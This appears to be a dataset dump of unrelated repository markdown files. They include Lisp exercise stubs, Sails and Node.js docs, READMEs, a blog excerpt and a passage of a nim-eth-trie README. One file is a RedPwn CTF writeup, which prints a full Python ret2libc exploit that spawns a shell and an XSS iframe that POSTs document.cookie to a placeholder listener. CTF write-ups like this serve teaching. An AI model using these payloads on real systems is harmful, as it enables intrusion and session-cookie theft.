```
## Exercise 3.22.6
**More Synthesizable Verilog**
```lisp
```
## Exercise 3.22.7
**Even More Synthesizable Verilog**
```lisp
```
## Exercise 3.22.8
**Generating Verilog/VHDL from Common Lisp**
```lisp
```
## Project 3.22.9
**A DSL for Verilog/VHDL**
```lisp
```
## Exercise 3.22.10
**Hardware Support for Common Lisp's Special Forms**
```lisp
```
## Exercise 3.22.11
**The Lisp Machine's Memory Model**
```lisp
```
## Exercise 3.22.12
**A 64-Bit Lisp Machine Architecture**
```lisp
```
## Project 3.22.13
**Common Lisp for the Lisp Machine**
```lisp
```
## Project 3.22.14
**Porting the LispOS to the Lisp Machine Architecture**
```lisp
```
<ul class="pager">
<li class="previous"><a href="/book/3-21-00-lispos/">« Previous</a></li>
<li><a href="/book/">Table of Contents</a></li>
<li class="next"><a href="/book/3-23-00-gov-mil/">Next »</a><li>
</ul>
| 35.701389 | 966 | 0.749271 | eng_Latn | 0.995993 |
6104004f70d9c95dc62ac8d921bd47100ba9bac2 | 47 | md | Markdown | README.md | andyhuzhill/andyhuzhill.github.com | 8bf679bbcefcac6b9f7ae93d1e7aab4d2fb81497 | [
"MIT"
] | 1 | 2015-10-23T07:33:58.000Z | 2015-10-23T07:33:58.000Z | README.md | andyhuzhill/andyhuzhill.github.com | 8bf679bbcefcac6b9f7ae93d1e7aab4d2fb81497 | [
"MIT"
] | null | null | null | README.md | andyhuzhill/andyhuzhill.github.com | 8bf679bbcefcac6b9f7ae93d1e7aab4d2fb81497 | [
"MIT"
] | null | null | null | # Hu Zhenyu's Blog
Personal Blog using jekyll
| 11.75 | 26 | 0.765957 | kor_Hang | 0.903562 |
61045332a03f1ede4d82e9af8ae7c7327efe6d03 | 635 | md | Markdown | docs/reference/req/req.params.md | eunuda/eueu | 06ce9cfbe6533734879079e02b0ef7b62f9ce31b | [
"MIT"
] | 16,856 | 2015-01-01T00:25:24.000Z | 2022-03-31T06:52:21.000Z | docs/reference/req/req.params.md | eunuda/eueu | 06ce9cfbe6533734879079e02b0ef7b62f9ce31b | [
"MIT"
] | 5,031 | 2015-01-01T10:00:06.000Z | 2022-03-30T20:34:24.000Z | docs/reference/req/req.params.md | eunuda/eueu | 06ce9cfbe6533734879079e02b0ef7b62f9ce31b | [
"MIT"
] | 1,901 | 2015-01-02T08:45:26.000Z | 2022-03-25T02:34:39.000Z | # `req.params`
An object containing parameter values parsed from the URL path.
For example if you have the route `/user/:name`, then the "name" from the URL path wil be available as `req.params.name`. This object defaults to `{}`.
### Usage
```usage
req.params;
```
### Notes
> + When a route address is defined using a regular expression, each capture group match from the regex is available as `req.params[0]`, `req.params[1]`, etc. This strategy is also applied to unnamed wild-card matches in string routes such as `/file/*`.
<docmeta name="displayName" value="req.params">
<docmeta name="pageType" value="property">
| 25.4 | 253 | 0.714961 | eng_Latn | 0.995458 |
610533530541e72dad21a347bd0c4caf659a6b63 | 128 | md | Markdown | pec2/README.md | dappsar/uah | 3d2ab32436a5a1a0ed05fec0537c681fe3ef1c01 | [
"MIT"
] | null | null | null | pec2/README.md | dappsar/uah | 3d2ab32436a5a1a0ed05fec0537c681fe3ef1c01 | [
"MIT"
] | null | null | null | pec2/README.md | dappsar/uah | 3d2ab32436a5a1a0ed05fec0537c681fe3ef1c01 | [
"MIT"
] | null | null | null | # Ejercicios de la PEC2
## [Ejercicio 1](ej1/pec2-ej1.md)
## [Ejercicio 2](ej2/pec2-ej2.md)
## [Ejercicio 3](ej3/pec2-ej3.md) | 18.285714 | 33 | 0.65625 | spa_Latn | 0.454145 |
610615e4c940ee41f28937066f748f69401190f3 | 10,798 | md | Markdown | _posts/ctf/2020-06-25-redpwn-ctf-writeup.md | stoned-newton/0x90skids.github2.io | 4f10eaaf72e73512fcac0257c28bd1431587da01 | [
"MIT"
] | 8 | 2020-07-03T04:40:30.000Z | 2021-05-31T05:33:10.000Z | _posts/ctf/2020-06-25-redpwn-ctf-writeup.md | stoned-newton/0x90skids.github2.io | 4f10eaaf72e73512fcac0257c28bd1431587da01 | [
"MIT"
] | 8 | 2020-07-17T18:57:35.000Z | 2021-12-02T01:15:06.000Z | _posts/ctf/2020-06-25-redpwn-ctf-writeup.md | stoned-newton/0x90skids.github2.io | 4f10eaaf72e73512fcac0257c28bd1431587da01 | [
"MIT"
] | 1 | 2020-07-28T06:50:16.000Z | 2020-07-28T06:50:16.000Z | ---
layout: post
title: RedPwn CTF Writeup
date: 2020-06-25 01:00 +0700
modified: 2020-03-07 16:49:47 +07:00
description: 0x90skids writeups for the 2020 RedPwn CTF Competition
tag:
- ctf
- writeup
image: https://0x90skids.com/redpwn-ctf-writeup/carbon.png
author: 0x90skids
summmary: 0x90skids writeups for the 2020 RedPwn CTF Competition
comments: true
---
> RedPwn is an annual CTF event hosted online. 0x90skids recently competed in the 2020 competition and placed 63 overall.
<div class="row mt-3">
<div class="col-sm mt-3 mt-md-0">
<img class="img-fluid rounded z-depth-1" src="carbon.png">
</div>
</div>
# Categories
+ [Misc](#misc)
+ [Pwn](#pwn)
+ [Web](#web)
## Misc
### misc/uglybash
**Solved By:** tbutler0x90
**Points:** 359
**Flag:** flag{us3_zsh,-dummy}
##### Challenge
This bash script evaluates to echo dont just run it, dummy # flag{...} where the flag is in the comments.The comment won't be visible if you just execute the script. How can you mess with bash to get the value right before it executes?
*Exerpt of Challenge Script, cmd.sh*
> ```${*%c-dFqjfo} e$'\u0076'al "$( ${*%%Q+n\{} "${@~}" $'\160'r""$'\151'$@nt"f" %s ' }~~@{$"```
##### Solution
1) To see what the bash script evaluates to just prior to execution, the subshell option was used to run the entire script in debug mode with the -x flag. Additionally, parameters were added to the script to print the debug output to a file.
```bash
#!/bin/bash
exec 5> debug_output.txt
BASH_XTRACEFD="5"
### original script goes below here
```
2) The script was run with the -x flag.
```bash
bash -x cmd.exe
```
3) Flag was located in the comments along the left side in the debug_output.txt, lines 70 -108
<figure>
<img src="uglybash.png" alt="results of debug">
<figcaption>Fig 1. Flag is spelled out downwards on the left side</figcaption>
</figure>
## Pwn
### pwn/the-library
**Solved By:** cernec1999
**Points:** 424
**Flag:** flag{jump_1nt0_th3_l1brary}
##### Challenge
There's not a lot of useful functions in the binary itself. I wonder where you can get some...
##### Solution
When solving a binary exploitation task, the first step I normally take is to check out the permissions of the binary. We can use the ```checksec``` tool to do this. Additionally, we should check out the architecture of the binary.
```console
cernec1999@ccerne:~/Downloads$ checksec the-library
[*] '/home/cernec1999/Downloads/the-library'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
cernec1999@ccerne:~/Downloads$ file the-library
the-library: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3067a5291814bef337dafc695eee28f371370eae, not stripped
```
With this information, it seems that intermediate binary exploitation techniques can be applied to solve this challenge. Fortunately, there are no stack cookies and the binary is not position independent. However, DEP is enabled, so we cannot simply jump to the stack to run shellcode.
Because of the challenge name, ```the-library```, my best assumption is that we need to jump to libc.
We are given no information about the host system, but we can assume that full ASLR is enabled and that the libraries are randomized. This means that every time a binary executes, the kernel assigns it a new base address to make exploitation harder. Thus, there must be a way for us to somehow leak the libc base address for system.
Unfortunately, we cannot use a print format vulnerability to leak the base address of libc. Instead, we can use a traditional buffer overflow vulnerability, utilizing some ROP gadgets, to gather the information that we need. Fortunately, we are given the source, so we can easily figure out how to trigger the overflow.
```c
#include <stdio.h>
#include <string.h>
int main(void)
{
char name[16];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts("Welcome to the library... What's your name?");
read(0, name, 0x100);
puts("Hello there: ");
puts(name);
}
```
Using GDB, I figured out that exactly 24 bytes can be written into ```name``` before the return address is written to. Next, it is time to figure out useful gadgets to leak the libc base address. This should be pretty easy with a couple of leaked gadgets. In the Global Offset Table, at address ```0x600ff0``` is where ```__libc_start_main``` is stored. We can call ```puts``` in the binary to leak this address. Finally, we should jump back to the start of the code to get another overflow to jump to the ```system``` address in the libc library. Here is the code to do all of that:
```python
import struct, sys, telnetlib
# Connection info
HOST = '2020.redpwnc.tf'
PORT = '31350'
# Init a new Telnet session
my_tel = telnetlib.Telnet(HOST, PORT)
def p64_b(num):
return struct.pack('<Q', num)
def p64_i(b_arr):
return struct.unpack('<Q', b_arr)[0]
# Gadgets to leak libc
POP_RDI_RET = p64_b(0x400733)
LIBC_START = p64_b(0x600ff0)
PUTS_PLT = p64_b(0x400520)
START = p64_b(0x400550)
# Leak __libc_start_main address then jump
chain = b'A'*24 + POP_RDI_RET + LIBC_START + PUTS_PLT + START
my_tel.write(chain)
```
Next, given this information, we should figure out where in libc to jump to. Fortunately, we are given the libc that is linked at runtime on the host system. There is a [great resource you can use](https://libc.blukat.me/) to identify a version of libc easily. I used this tool to figure out that the library is ```libc6_2.27-3ubuntu1_amd64```. It additionally calculated the offsets to useful functions.

Using this useful information, we can do the following:
1. Put a pointer to /bin/sh into RDI
2. Jump to system
Thus, our finished exploit looks like this:
```python
#!/usr/bin/python3
import struct, sys, telnetlib
# Connection info
HOST = '2020.redpwnc.tf'
PORT = '31350'
# Init a new Telnet session
my_tel = telnetlib.Telnet(HOST, PORT)
def p64_b(num):
return struct.pack('<Q', num)
def p64_i(b_arr):
return struct.unpack('<Q', b_arr)[0]
# Gadgets to leak libc
POP_RDI_RET = p64_b(0x400733)
LIBC_START = p64_b(0x600ff0)
PUTS_PLT = p64_b(0x400520)
START = p64_b(0x400550)
# Leak __libc_start_main address then jump
chain = b'A'*24 + POP_RDI_RET + LIBC_START + PUTS_PLT + START
my_tel.write(chain)
# Get rid of junk
my_tel.read_until(b'there: ')
my_tel.read_until(b'\x0a')
my_tel.read_until(b'\x0a')
# Find address of libc, then turn it into system
libc_base = p64_i(my_tel.read_very_eager()[0:6] + b'\x00\x00')
# Now, with new information, jump to system!
BIN_SH_STR = p64_b(libc_base + 0x1923ea)
RET_GADGET = p64_b(0x400506)
SYSTEM_ADDR = p64_b(libc_base + 0x2d990)
# Construct the ROP chain
chain = b'A' * 24 + POP_RDI_RET + BIN_SH_STR + RET_GADGET + SYSTEM_ADDR
my_tel.write(chain)
my_tel.interact()
```
Voilà!
```console
cernec1999@ccerne:~/Downloads$ ./exp.py
Hello there:
AAAAAAAAAAAAAAAAAAAAAAAA3@
cat flag.txt
flag{jump_1nt0_th3_l1brary}
```
## Web
### web/static-static-website
**Solved By:** Bib<br>
**Points:** 435<br>
**Flag:** flag{wh0_n33d5_d0mpur1fy}
##### Challenge
Seeing that my last website was a success, I made a version where instead of storing text, you can make your own custom websites! If you make something cool, send it to me [here](https://admin-bot.redpwnc.tf/submit?challenge=static-static-hosting)
Site: [static-static-hosting.2020.redpwnc.tf](https://static-static-hosting.2020.redpwnc.tf/)
Note: The site is entirely static. Dirbuster will not be useful in solving it.
##### Solution
To solve this, I needed to create an HTML page that, when opened by the "admin", would steal their cookies.
So the first thing I did was check the source of the HTML page to see if any sanitization was done when creating the HTML page.
The page has a ```script.js``` file that contained the following :
```
(async () => {
await new Promise((resolve) => {
window.addEventListener('load', resolve);
});
const content = window.location.hash.substring(1);
display(atob(content));
})();
function display(input) {
document.documentElement.innerHTML = clean(input);
}
function clean(input) {
const template = document.createElement('template');
const html = document.createElement('html');
template.content.appendChild(html);
html.innerHTML = input;
sanitize(html);
const result = html.innerHTML;
return result;
}
function sanitize(element) {
const attributes = element.getAttributeNames();
for (let i = 0; i < attributes.length; i++) {
// Let people add images and styles
if (!['src', 'width', 'height', 'alt', 'class'].includes(attributes[i])) {
element.removeAttribute(attributes[i]);
}
}
const children = element.children;
for (let i = 0; i < children.length; i++) {
if (children[i].nodeName === 'SCRIPT') {
element.removeChild(children[i]);
i --;
} else {
sanitize(children[i]);
}
}
}
```
This told me that they removed all attributes except for ```src```, ```width```, ```height```, ```alt``` & ```class```.
Also, it removes the ```<script>``` tags and everything that's inside.
I've confirmed that I could do XSS by using an ```<iframe>``` or ```<embed>``` tag.
This is where I fell down a major rabbit hole...
Because of the filtered attributes, I thought that they wanted us to craft an SVG image containing malicious code. Unfortunately, that was not the case.
After losing a couple of hours down that rabbit hole, I decided to look for another solution.
I've thought about another idea : Why not try to send a hidden form that will submit itself when the "admin" clicks the link?
So I've come up with this code :
```
<html>
<head>
</head>
<body>
<iframe src="javascript:var f=document.createElement('form');f.action='http://LISTENER_URL_HERE/';f.method='POST';
f.target='_blank';var k=document.createElement('input');k.type='hidden';k.name='flag';k.value=document.cookie;f.appendChild(k);document.body.appendChild(f);f.submit();console.log('Cookie stolen!');"></iframe>
</body>
</html>
```
This main caveat here was the use of ```target='_blank'```.
If you don't open in a new tab, you would get the iframe cookies (no cookie was returned).
So finally, submitting this code to the admin page stole the cookie containing the flag and sent it to my listener.
I'm pretty happy with this solve, even though I went down a time-losing rabbit hole.
That SVG stuff was actually useful in another CTF we did later on.
```flag{wh0_n33d5_d0mpur1fy}``` | 35.058442 | 583 | 0.710595 | eng_Latn | 0.970156 |
610684c8ea7a2c269f3c0e468a97b538ae429fff | 2,084 | md | Markdown | README.md | ceramicskate0/LinuxConfigs-1 | 47b83b8d7dd1d5683bf582053255849f819ae742 | [
"Unlicense"
] | null | null | null | README.md | ceramicskate0/LinuxConfigs-1 | 47b83b8d7dd1d5683bf582053255849f819ae742 | [
"Unlicense"
] | null | null | null | README.md | ceramicskate0/LinuxConfigs-1 | 47b83b8d7dd1d5683bf582053255849f819ae742 | [
"Unlicense"
] | null | null | null | # Linux service Configs

#Legal Notice:
I dont recommend or condone using anything on here for any reason. The scipts here may work, but are just as likely have a chance to break the system they are run on. If you use them you do so at your own risk. I do/have NEVER authorized,condoned, or recommend the use of anything in any of my repos for any reason, even if previously stated. This is a collection of simple code I found useful with my own Kali OS for educational purposes only. All credit goes to the authors whos full URL and/or github account and/or Repo is listed in the section above, please see their sites for more info or issue with their repo's. It should be noted that since these are all publically available. Do not use for evil, malicious purposes, or on machines you do not own.
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <http://unlicense.org>
| 63.151515 | 758 | 0.794626 | eng_Latn | 0.989533 |
6109342235fa3c3880fea5bcad58ff4c771a3f86 | 3,467 | md | Markdown | _posts/2019-11-09-nodejs-server_basic-007.md | devdhjo/devdhjo.github.io | 070795985c95ddf98d4e08535f6d7c4a402fac5f | [
"MIT"
] | null | null | null | _posts/2019-11-09-nodejs-server_basic-007.md | devdhjo/devdhjo.github.io | 070795985c95ddf98d4e08535f6d7c4a402fac5f | [
"MIT"
] | null | null | null | _posts/2019-11-09-nodejs-server_basic-007.md | devdhjo/devdhjo.github.io | 070795985c95ddf98d4e08535f6d7c4a402fac5f | [
"MIT"
] | 1 | 2021-05-03T01:57:49.000Z | 2021-05-03T01:57:49.000Z | ---
layout: post
title: "[nodejs] 007# 파일 입출력"
tags: [nodejs, server_basic]
categories: nodejs
---
#### ◇ 파일 I/O
nodejs 는 파일을 읽고 쓰기 위해 동기와 비동기 두 가지 형태의 함수를 제공합니다. 이벤트 방식의 비동기를 지향하기 때문에 비동기 방식의 파일 읽고 쓰기가 default 입니다.
이 포스팅에서는 url 모듈을 사용하여 요청된 자원이 파일인 경우 해당 파일을 읽어 클라이언트에 전달하는 예제를 실행해보겠습니다.
### 1. 파일 읽기
- file_read.js 파일을 생성합니다.
{% highlight javascript linenos %}
// 1. fs (파일시스템) 모듈 사용
var fs = require('fs');
// 2. 비동기 방식의 파일 읽기
// - 파일을 읽은 후 마지막 파라미터에 넘긴 callback 함수가 호출
fs.readFile('module_example.js', 'utf-8', function(error, data) {
console.log('01 readAsync : %s', data);
});
// 3. 동기 방식의 파일 읽기
// - 파일을 읽은 후 data 변수에 저장
var data = fs.readFileSync('module_example.js', 'utf-8');
console.log('02 readSync : %s', data);
{% endhighlight %}
- 1번의 readFile() 함수는 비동기방식으로 파일을 읽는 함수가 다른 thread 에 의해 실행되기 때문에 2번 readFileSync() 함수가 먼저 처리됩니다.

### 2. 파일 쓰기
- file_write.js 파일을 생성합니다.
{% highlight javascript linenos %}
var fs = require('fs');
// 1. 새로 생성할 파일에 입력될 문자열
var data = "File Write Test";
// 2. 비동기 방식으로 파일을 생성
// - 파라미터 : 파일명, 입력데이터, 인코딩, 콜백함수
fs.writeFile('file01_async.txt', data, 'utf-8', function(e) {
if(e) {
// 3. 파일 생성 중 오류가 발생한 경우 콘솔에 오류 출력
console.log(e);
} else {
// 4. 파일 생성 중 오류가 없다면 완료 문자열 출력
console.log('01 WRITE DONE!');
}
});
// 5. 동기 방식은 callback 함수를 통한 오류 처리를 할 수 없기 때문에
// 함수 전체를 try 문으로 예외처리
try {
// 6. 동기 방식으로 파일 생성
// - 파라미터 : 파일명, 입력데이터, 인코딩
fs.writeFileSync('file02_sync.txt', data, 'utf-8');
console.log('02 WRITE DONE!');
} catch(e) {
console.log(e);
}
{% endhighlight %}
- 파일 읽기와 마찬가지로 동기방식인 2번 함수의 로그가 먼저 출력됩니다.
- 텍스트 파일을 열면 data 변수에 지정한 문자열이 입력되어 있는 것을 확인할 수 있습니다.

### 3. 브라우저를 통한 파일 요청 처리
#### 1) 요청 대상이 되는 html 파일을 작성합니다.
- file_test.html
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>file test</title>
</head>
<body>
<h1>Hello</h1>
클라이언트에서 파일 요청 처리 예제 입니다. </br>
server_req_file.js 에서 처리합니다.
</body>
</html>
```
#### 2) 요청을 처리할 server_req_file.js 파일을 작성합니다.
- server_req_file.js
{% highlight javascript linenos %}
var http = require('http');
var url = require('url');
var fs = require('fs');
var server = http.createServer(function(request, response) {
var parsedUrl = url.parse(request.url);
var resource = parsedUrl.pathname;
// 1. 요청된 자원이 /test 이면
if(resource == '/test') {
// 2. file_test.html 파일을 읽은 후
fs.readFile('file_test.html', 'utf-8', function(error, data) {
// 2-1. 읽으면서 오류가 발생한 경우 오류 내용을 출력
if(error) {
response.writeHead(500, {'Content-Type':'text/html'});
response.end('500 Internal Server Error : ' + error);
} else {
// 2-2. 오류 없이 정상적으로 읽기가 완료된 경우 파일의 내용을 클라이언트에 전달
response.writeHead(200, {'Content-Type':'text/html'});
response.end(data);
}
});
} else {
response.writeHead(404, {'Content-Type':'text/html'});
response.end('404 Page Not Found');
}
});
server.listen(9074, function() {
console.log('Server is running...');
})
{% endhighlight %}
#### 3) 파일 실행
- 2에서 생성한 server_req_file 을 실행한 후 [http://localhost:9074/test](http://localhost:9074/test) 를 요청하면 1에서 작성한 화면이 출력되는 것을 확인할 수 있습니다.

| 24.076389 | 131 | 0.627344 | kor_Hang | 0.999917 |
610992167ee8f330daa880c0de55a25581358eee | 99 | md | Markdown | app/contents/biomarkers/fr-FR/very-small-ldl-d.md | gionatamettifogo/biomarkers | 15723cfcfa1338bea24d155122b38d31ff53d8cb | [
"MIT"
] | null | null | null | app/contents/biomarkers/fr-FR/very-small-ldl-d.md | gionatamettifogo/biomarkers | 15723cfcfa1338bea24d155122b38d31ff53d8cb | [
"MIT"
] | 21 | 2022-03-02T09:03:43.000Z | 2022-03-26T03:36:07.000Z | app/contents/biomarkers/fr-FR/very-small-ldl-d.md | gionatamettifogo/biomarkers | 15723cfcfa1338bea24d155122b38d31ff53d8cb | [
"MIT"
] | 1 | 2022-03-01T11:11:41.000Z | 2022-03-01T11:11:41.000Z | ---
translation: automatic
title: Très petit LDL-d
description: Un sous-type de très petit LDL
---
| 16.5 | 43 | 0.737374 | fra_Latn | 0.602744 |
610a1cb8c794458683b2a73ecbfae622109c943f | 864 | md | Markdown | _posts/2019-08-06-a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-08-06-a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-08-06-a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | 1 | 2022-01-13T07:57:24.000Z | 2022-01-13T07:57:24.000Z | ---
layout: post
item_id: 2683981048
title: >-
A campanha acabou, Bolsonaro! Você tem de entender que ganhou, porra!!!
author: Tatu D'Oquei
date: 2019-08-06 05:19:00
pub_date: 2019-08-06 05:19:00
time_added: 2019-08-07 05:56:45
category:
tags: []
image: https://conteudo.imguol.com.br/blogs/278/files/2019/08/johhnybravo-615x300.jpg
---
"A campanha acabou para a imprensa. Eu ganhei! A imprensa tem que entender que eu, Johnny Bravo, Jair Bolsonaro, ganhou, porra! Ganhou, porra! Vamos entender isso. Vamos trabalhar junto pelo Brasil. O trabalho de vocês é excelente. Desde que seja bem-feito.
**Link:** [https://reinaldoazevedo.blogosfera.uol.com.br/2019/08/06/a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra/](https://reinaldoazevedo.blogosfera.uol.com.br/2019/08/06/a-campanha-acabou-bolsonaro-voce-tem-de-entender-que-ganhou-porra/)
| 45.473684 | 260 | 0.759259 | por_Latn | 0.962475 |
610a33ffb9373743a572c31269c37a96b60282fd | 13,805 | md | Markdown | README.md | status-im/nim-eth-trie | d4175803b26540e880aef0e9c0e3df1604a77be9 | [
"Apache-2.0"
] | 5 | 2018-06-30T12:58:51.000Z | 2020-10-19T04:25:31.000Z | README.md | status-im/nim-eth-trie | d4175803b26540e880aef0e9c0e3df1604a77be9 | [
"Apache-2.0"
] | 17 | 2018-06-20T07:16:04.000Z | 2019-02-12T18:17:10.000Z | README.md | status-im/nim-eth-trie | d4175803b26540e880aef0e9c0e3df1604a77be9 | [
"Apache-2.0"
] | 2 | 2018-09-23T05:26:48.000Z | 2019-03-03T16:40:16.000Z | # nim-trie
# MOVED TO https://github.com/status-im/nim-eth
Nim Implementation of the Ethereum Trie structure
---
[")](https://travis-ci.org/status-im/nim-eth-trie)
[")](https://ci.appveyor.com/project/nimbus/nim-eth-trie)
[](https://opensource.org/licenses/Apache-2.0)
[](https://opensource.org/licenses/MIT)

## Hexary Trie
## Binary Trie
Binary-trie is a dictionary-like data structure to store key-value pair.
Much like it's sibling Hexary-trie, the key-value pair will be stored into key-value flat-db.
The primary difference with Hexary-trie is, each node of Binary-trie only consist of one or two child,
while Hexary-trie node can contains up to 16 or 17 child-nodes.
Unlike Hexary-trie, Binary-trie store it's data into flat-db without using rlp encoding.
Binary-trie store its value using simple **Node-Types** encoding.
The encoded-node will be hashed by keccak_256 and the hash value will be the key to flat-db.
Each entry in the flat-db will looks like:
| key | value |
|----------------------|--------------------------------------------|
| 32-bytes-keccak-hash | encoded-node(KV or BRANCH or LEAF encoded) |
### Node-Types
* KV = [0, encoded-key-path, 32 bytes hash of child]
* BRANCH = [1, 32 bytes hash of left child, 32 bytes hash of right child]
* LEAF = [2, value]
The KV node can have BRANCH node or LEAF node as it's child, but cannot a KV node.
The internal algorithm will merge a KV(parent)->KV(child) into one KV node.
Every KV node contains encoded keypath to reduce the number of blank nodes.
The BRANCH node can have KV, BRANCH, or LEAF node as it's children.
The LEAF node is the terminal node, it contains the value of a key.
### encoded-key-path
While Hexary-trie encode the path using Hex-Prefix encoding, Binary-trie
encode the path using binary encoding, the scheme looks like this table below.
```text
|--------- odd --------|
00mm yyyy xxxx xxxx xxxx xxxx
|------ even -----|
1000 00mm yyyy xxxx xxxx xxxx
```
| symbol | explanation |
|--------|--------------------------|
| xxxx | nibble of binary keypath in bits, 0 = left, 1 = right|
| yyyy | nibble contains 0-3 bits padding + binary keypath |
| mm | number of binary keypath bits modulo 4 (0-3) |
| 00 | zero zero prefix |
| 1000 | even numbered nibbles prefix |
if there is no padding, then yyyy bit sequence is absent, mm also zero.
yyyy = mm bits + padding bits must be 4 bits length.
### The API
The primary API for Binary-trie is `set` and `get`.
* set(key, value) --- _store a value associated with a key_
* get(key): value --- _get a value using a key_
Both `key` and `value` are of `BytesRange` type. And they cannot have zero length.
You can also use convenience API `get` and `set` which accepts
`Bytes` or `string` (a `string` is conceptually wrong in this context
and may costlier than a `BytesRange`, but it is good for testing purpose).
Getting a non-existent key will return zero length BytesRange.
Binary-trie also provide dictionary syntax API for `set` and `get`.
* trie[key] = value -- same as `set`
* value = trie[key] -- same as `get`
* contains(key) a.k.a. `in` operator
Additional APIs are:
* exists(key) -- returns `bool`, to check key-value existence -- same as contains
* delete(key) -- remove a key-value from the trie
* deleteSubtrie(key) -- remove a key-value from the trie plus all of it's subtrie
that starts with the same key prefix
* rootNode() -- get root node
* rootNode(node) -- replace the root node
* getRootHash(): `KeccakHash` with `BytesRange` type
* getDB(): `DB` -- get flat-db pointer
Constructor API:
* initBinaryTrie(DB, rootHash[optional]) -- rootHash has `BytesRange` or KeccakHash type
* init(BinaryTrie, DB, rootHash[optional])
Normally you would not set the rootHash when constructing an empty Binary-trie.
Setting the rootHash occured in a scenario where you have a populated DB
with existing trie structure and you know the rootHash,
and then you want to continue/resume the trie operations.
## Examples
```Nim
import
eth_trie/[db, binary, utils]
var db = newMemoryDB()
var trie = initBinaryTrie(db)
trie.set("key1", "value1")
trie.set("key2", "value2")
assert trie.get("key1") == "value1".toRange
assert trie.get("key2") == "value2".toRange
# delete all subtrie with key prefixes "key"
trie.deleteSubtrie("key")
assert trie.get("key1") == zeroBytesRange
assert trie.get("key2") == zeroBytesRange
trie["moon"] = "sun"
assert "moon" in trie
assert trie["moon"] == "sun".toRange
```
Remember, `set` and `get` are trie operations. A single `set` operation may invoke
more than one store/lookup operation into the underlying DB. The same is also happened to `get` operation,
it could do more than one flat-db lookup before it return the requested value.
## The truth behind a lie
What kind of lie? actually, `delete` and `deleteSubtrie` doesn't remove the
'deleted' node from the underlying DB. It only make the node inaccessible
from the user of the trie. The same also happened if you update the value of a key,
the old value node is not removed from the underlying DB.
A more subtle lie also happened when you add new entrie into the trie using `set` operation.
The previous hash of affected branch become obsolete and replaced by new hash,
the old hash become inaccessible to the user.
You may think that is a waste of storage space.
Luckily, we also provide some utilities to deal with this situation, the branch utils.
## The branch utils
The branch utils consist of these API:
* checkIfBranchExist(DB; rootHash; keyPrefix): bool
* getBranch(DB; rootHash; key): branch
* isValidBranch(branch, rootHash, key, value): bool
* getWitness(DB; nodeHash; key): branch
* getTrieNodes(DB; nodeHash): branch
`keyPrefix`, `key`, and `value` are bytes container with length greater than zero.
They can be BytesRange, Bytes, and string(again, for convenience and testing purpose).
`rootHash` and `nodeHash` also bytes container,
but they have constraint: must be 32 bytes in length, and it must be a keccak_256 hash value.
`branch` is a list of nodes, or in this case a seq[BytesRange].
A list? yes, the structure is stored along with the encoded node.
Therefore a list is enough to reconstruct the entire trie/branch.
```Nim
import
eth_trie/[db, binary, utils]
var db = newMemoryDB()
var trie = initBinaryTrie(db)
trie.set("key1", "value1")
trie.set("key2", "value2")
assert checkIfBranchExist(db, trie.getRootHash(), "key") == true
assert checkIfBranchExist(db, trie.getRootHash(), "key1") == true
assert checkIfBranchExist(db, trie.getRootHash(), "ken") == false
assert checkIfBranchExist(db, trie.getRootHash(), "key123") == false
```
The tree will looks like:
```text
root ---> A(kvnode, *common key prefix*)
|
|
|
B(branchnode)
/ \
/ \
/ \
C1(kvnode, *remain kepath*) C2(kvnode, *remain kepath*)
| |
| |
| |
D1(leafnode, b'value1') D2(leafnode, b'value2')
```
```Nim
var branchA = getBranch(db, trie.getRootHash(), "key1")
# ==> [A, B, C1, D1]
var branchB = getBranch(db, trie.getRootHash(), "key2")
# ==> [A, B, C2, D2]
assert isValidBranch(branchA, trie.getRootHash(), "key1", "value1") == true
# wrong key, return zero bytes
assert isValidBranch(branchA, trie.getRootHash(), "key5", "") == true
assert isValidBranch(branchB, trie.getRootHash(), "key1", "value1") # InvalidNode
var x = getBranch(db, trie.getRootHash(), "key")
# ==> [A]
x = getBranch(db, trie.getRootHash(), "key123") # InvalidKeyError
x = getBranch(db, trie.getRootHash(), "key5") # there is still branch for non-exist key
# ==> [A]
var branch = getWitness(db, trie.getRootHash(), "key1")
# equivalent to `getBranch(db, trie.getRootHash(), "key1")`
# ==> [A, B, C1, D1]
branch = getWitness(db, trie.getRootHash(), "key")
# this will include additional nodes of "key2"
# ==> [A, B, C1, D1, C2, D2]
var wholeTrie = getWitness(db, trie.getRootHash(), "")
# this will return the whole trie
# ==> [A, B, C1, D1, C2, D2]
var node = branch[1] # B
let nodeHash = keccak256.digest(node.baseAddr, uint(node.len))
var nodes = getTrieNodes(db, nodeHash)
assert nodes.len == wholeTrie.len - 1
